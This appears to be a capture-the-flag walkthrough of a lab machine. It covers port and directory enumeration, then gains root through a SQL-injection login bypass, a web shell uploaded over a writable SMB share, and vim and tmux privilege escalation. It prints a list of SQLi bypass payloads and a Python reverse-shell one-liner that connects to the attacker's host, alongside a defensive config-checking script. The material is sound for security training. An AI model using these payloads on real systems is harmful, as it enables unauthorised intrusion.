- First we start with an nmap scan:
nmap -sC -sV -T4 <IP> -Pn
Nmap scan report for 10.10.144.47
Host is up (0.18s latency).
Not shown: 995 closed tcp ports (conn-refused)
PORT STATE SERVICE VERSION
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
445/tcp open netbios-ssn Samba smbd 4.7.6-Ubuntu (workgroup: WORKGROUP)
8080/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-title: Apache2 Ubuntu Default Page: It works
|_http-server-header: Apache/2.4.29 (Ubuntu)
8082/tcp open http Node.js Express framework
|_http-title: Site doesn't have a title (text/html; charset=UTF-8).
9071/tcp filtered unknown
Service Info: Host: INCOGNITO
Host script results:
| smb-security-mode:
| account_used: guest
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
|_clock-skew: mean: 2s, deviation: 0s, median: 2s
| smb2-time:
| date: 2024-06-02T21:27:53
|_ start_date: N/A
|_nbstat: NetBIOS name: INCOGNITO, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown)
| smb-os-discovery:
| OS: Windows 6.1 (Samba 4.7.6-Ubuntu)
| Computer name: incognito
| NetBIOS computer name: INCOGNITO\x00
| Domain name: \x00
| FQDN: incognito
|_ System time: 2024-06-02T21:27:53+00:00
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled but not required
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 34.01 seconds
- We have HTTP on ports 8080 and 8082 and SMB on ports 139 and 445 open. Let's enumerate HTTP first: port 8080 serves the default Apache page, so let's fuzz for directories:
❯ ffuf -u "http://10.10.144.47:8080/FUZZ" -w /usr/share/dirb/wordlists/common.txt -fc 403
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8080/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 163ms]
dev [Status: 301, Size: 317, Words: 20, Lines: 10, Duration: 141ms]
index.html [Status: 200, Size: 10918, Words: 3499, Lines: 376, Duration: 153ms]
index.php [Status: 200, Size: 4, Words: 1, Lines: 1, Duration: 225ms]
:: Progress: [4614/4614] :: Job [1/1] :: 252 req/sec :: Duration: [0:00:21] :: Errors: 0 ::
- Visiting the /dev directory with a browser, I got a Forbidden error:
- Fuzzing for more hidden directories from the /dev directory, this time adding some extensions to fuzz with:
❯ ffuf -u http://10.10.144.47:8080/dev/FUZZ -w /usr/share/dirb/wordlists/common.txt -fc 403 -e .txt,.php,.bak
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8080/dev/FUZZ
:: Wordlist : FUZZ: /usr/share/dirb/wordlists/common.txt
:: Extensions : .txt .php .bak
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
note.txt [Status: 200, Size: 45, Words: 6, Lines: 2, Duration: 157ms]
:: Progress: [18456/18456] :: Job [1/1] :: 269 req/sec :: Duration: [0:01:23] :: Errors: 0 ::
- Checking what is in note.txt with a browser:
- Enumerating the other HTTP server, running on port 8082:
- Fuzzing for directories:
❯ ffuf -u http://10.10.144.47:8082/FUZZ -w /usr/share/wordlists/dirb/common.txt -fc 403 -e .txt,.bak,.php
v2.1.0-dev
________________________________________________
:: Method : GET
:: URL : http://10.10.144.47:8082/FUZZ
:: Wordlist : FUZZ: /usr/share/wordlists/dirb/common.txt
:: Extensions : .txt .bak .php
:: Follow redirects : false
:: Calibration : false
:: Timeout : 10
:: Threads : 40
:: Matcher : Response status: 200-299,301,302,307,401,403,405,500
:: Filter : Response status: 403
________________________________________________
[Status: 200, Size: 11162, Words: 2014, Lines: 126, Duration: 178ms]
login [Status: 200, Size: 1605, Words: 352, Lines: 29, Duration: 153ms]
Login [Status: 200, Size: 1605, Words: 352, Lines: 29, Duration: 153ms]
static [Status: 301, Size: 179, Words: 7, Lines: 11, Duration: 159ms]
:: Progress: [18456/18456] :: Job [1/1] :: 280 req/sec :: Duration: [0:01:16] :: Errors: 0 ::
- Visiting the /login directory with a browser:
- Trying out default credentials didn't work, so I researched ways to bypass login forms and found a post listing a lot of SQLi payloads for bypassing the form:
admin'/*
admin' or '1'='1
admin' or '1'='1'--
admin' or '1'='1'#
admin' or '1'='1'/*
admin"or 1=1 or ""="   <---- This payload works
admin' or 1=1
admin' or 1=1--
admin' or 1=1#
admin' or 1=1/*
admin') or ('1'='1
admin') or ('1'='1'--
admin') or ('1'='1'#
- I pasted the payload admin"or 1=1 or ""=" in the username field, left the password field blank, and boom, it works:
- So now I have credentials, what next?
- From the nmap scan earlier we have ports 139 and 445 open, which are SMB ports.
- So I tried to connect and list the shares on the SMB server with a NULL session:
❯ smbclient -L //10.10.144.47 -N
- We have a share named SECURED, so let's try to log in with the credentials we found earlier:
❯ smbclient //10.10.144.47/SECURED -U ArthurMorgan
- I noticed that the note.txt file in the SECURED share is exactly the same file as http://10.10.144.47:8080/dev/note.txt, so the share is backed by the /dev directory that Apache serves on port 8080.
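The misconfiguration that makes the next step possible is a share that authenticated users can write to and whose path lies inside the web server's document root. As an added example, not code from the original post, here is a small Python check that reads a Samba config and an Apache config and flags that overlap; the target's real smb.conf and vhost are not on the page, so the sample configs and the /var/www/html/dev path are constructed.

```python
import configparser
import os

# Constructed sample configs (the target's real files are not on the page):
# a share writable by authenticated users whose path sits under DocumentRoot.
SMB_CONF = """
[global]
workgroup = WORKGROUP
[SECURED]
path = /var/www/html/dev
read only = no
"""
APACHE_CONF = """
<VirtualHost *:8080>
    DocumentRoot /var/www/html
</VirtualHost>
"""

def document_roots(apache_conf):
    # Every DocumentRoot directive, normalised for path comparison.
    return [os.path.normpath(p.split()[1]) for p in apache_conf.splitlines()
            if p.split()[:1] == ["DocumentRoot"]]

def writable_shares(smb_conf):
    # Samba defaults to 'read only = yes'; 'writable'/'writeable = yes'
    # are the inverted synonyms that also make a share writable.
    cp = configparser.ConfigParser(strict=False)
    cp.read_string(smb_conf)
    shares = []
    for name in cp.sections():
        sec = cp[name]
        if name == "global" or "path" not in sec:
            continue
        read_only = sec.get("read only", "yes").strip().lower() == "yes"
        writable = sec.get("writable", sec.get("writeable", "no")).strip().lower() == "yes"
        if not read_only or writable:
            shares.append((name, os.path.normpath(sec["path"])))
    return shares

def shares_in_webroot(smb_conf, apache_conf):
    # Writable shares whose path is at or below a DocumentRoot: anything
    # written there over SMB is served by Apache, and .php files are executed.
    roots = document_roots(apache_conf)
    findings = []
    for name, path in writable_shares(smb_conf):
        for root in roots:
            if path == root or path.startswith(root + os.sep):
                findings.append((name, path, root))
    return findings
```
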
- We can upload a web shell to the SMB share:
- Let's check it at /dev/webshell.php on the web service (8080):
- Now let's gain a reverse shell:
python3 -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.9.2.221",1337));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("sh")'
- I started my listener and executed the above Python payload on the server:
- You can stabilize the shell with:
python3 -c 'import pty;pty.spawn("/bin/bash")'
CTRL+Z
stty raw -echo; fg
export TERM=xterm
stty rows 40 cols 160
- We got a shell as www-data, so we need to escalate our privileges to ArthurMorgan and capture the user flag.
- I uploaded linpeas to the target and ran it to look for more internal attack vectors:
- Looking at the active ports, one of them stands out: 4544. Let's use nc to check what runs on that port:
- It gives us options to choose from; after trying all of them, I figured out that option 4 opens a vim editor, so let's try to exploit vim to gain a shell, following GTFOBins:
- Now let's escalate privileges to root, running linpeas again:
- Hmm, there is a tmux session owned by the user marston.
- I haven't seen this before. Let's go to HackTricks:
- Let's check the tmux sessions available:
- Now we can attach to it with tmux attach-session -t 0:
- It opened a lot of tmux windows, and I am not that familiar with tmux, so I exited the windows one by one till I found something different 😂:
Conclusion
What we've learned:
- Enumerating SMB
- Enumerating Hidden Directories and Files via FFUF
- Exploiting SQL Injection In Login Page
- Uploading PHP Webshell Via SMB
- Port Forwarding
- Password Spraying
- Vertical Privilege Escalation Via vim
- Horizontal Privilege Escalation Via Hijacking Tmux Session
Thanks For Reading 😉